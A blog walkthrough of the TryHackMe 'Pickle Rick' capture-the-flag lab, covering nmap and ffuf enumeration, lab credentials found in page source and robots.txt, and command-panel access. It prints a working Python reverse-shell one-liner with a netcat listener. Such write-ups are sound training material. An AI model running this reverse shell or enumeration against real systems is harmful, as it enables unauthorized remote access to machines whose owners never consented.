November 14, 2024

Pickle Rick TryHackMe Walkthrough

Tinku July 30, 2021 0
Post Views: 1,955

Pickle Rick TryHackMe Walkthrough

pickle-rick

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

Today we will see how to solve a capture the flag challenge called “Pickle Rick”. It is a penetration testing lab available at TryHackMe. This challenge gives us hands-on on basic penetration testing techniques. It includes techniques such as scanning, enumeration, privilege escalation.

Credits for the machine goes to – TryHackMe

ethical hacking course

  Level: Easy

# What is the first ingredient Rick needs?

First of all, we will scan the machine IP with nmap and check all services are working on the machine. We found that on port no 80 HTTP services are active.

Nmap

We will now check the source page of the website and see if we can get some hints. Here we found the username.
Username ->R1ckRul3s

pickle-rick-user-name

Next, we tried to find the open directories using the tool ffuf. There are 2 open directories index.html and robots.txt .
command -> ffuf -t 100 -c -w /usr/share/dirb/wordlists/common.txt -u http://<machine_ip>/FUZZ

Ffuf-directory-scan

Then we will try to open the directories we found.  found a value in robots.txt.

pickle-rick-password

 

 

We will now search for a login page. We have scanned the website further and found a login page “login.php”.

pickle-rick-login-page

Open the login page and enter username and password we inittitaly found.

Username ->R1ckRul3s
password-> Wubbalubbadubdub

pickle-rick-login-pannel

We will then get a command panel
command -> ls

pickle-rick-logi-command-pannel

Sup3rS3cretPickl3Ingred.txt file contains the first flag!

 

 

 

# Whats the second ingredient Rick needs?

 

Since we didn’t have the super user access, we have to escalate our privileges.

For escalating our privileges we have used python3.
Command:
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<machine_IP>”,<Port_no>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Python-Privilege-Escalation

Before executing the command open the listening port.
command -> nc -lnvp <port_no>
-l => for opening listening port
-n => for getting the reverse shell
-v => for verbose
-p => for port number

After executing the command we will get a reverse shell.

netcat-listener-command

#Whats the second ingredient Rick needs?

Traverse through the directories to find the flag 2!
command -> cat ‘second ingredients’

pickle-rick-flag-2

# Whats the final ingredient Rick needs?

Traverse through the directories to find the flag 3!
command -> cat 3rd.txt

pickle-rick-flag-3

 

You May Also Like:-

How do find all hidden files and folders of web applications?
How to Find Information About Websites with Th3inspector

 

 

About Author

Tinku

See author's posts

Tags: , , , , , , , , , , , ,

More Stories

Active Directory for Hackers

Active Directory for Hackers | Pentesting Guide | Ethical Hackling in Delhi

Tahir August 25, 2024 0
Lame HTB Machine Walkthrough

Lame HTB Machine Walkthrough | Penetration Testing | Ethical Hacking

Tahir July 3, 2024 0
TASK MISP WALKTHROUGH

TASK MISP WALKTHROUGH

Tahir May 13, 2024 0

Leave a Reply

Your email address will not be published. Required fields are marked *

You may have missed

Digital Arrest of Cyber Expert Mohit Yadav

Digital Arrest of Cyber Expert Mohit Yadav for 2 Hours

Tahir October 19, 2024 0
Chinese Mobile Apps

Govt. of India Acts to “Immediately on Priority Basis” the Banning of 230+ Chinese Mobile Apps

Tahir September 26, 2024 0

Unit 8200: An Overview of Israel’s Elite Intelligence Unit

Tahir September 21, 2024 0

What is Unit 8200 of Israel? Hezbollah Pager Attacks are Connected to A Covert Cyberwarfare Unit

Tahir September 21, 2024 0
Neha Sharma

Neha Sharma — The Pakistani Spy Girl Who Lured Indian Defence Higher Officials To Acquire Sensitive Defence Secrets

Tahir September 4, 2024 0
en_USEnglish
en_USEnglish
Open chat
Hello
Can we help you?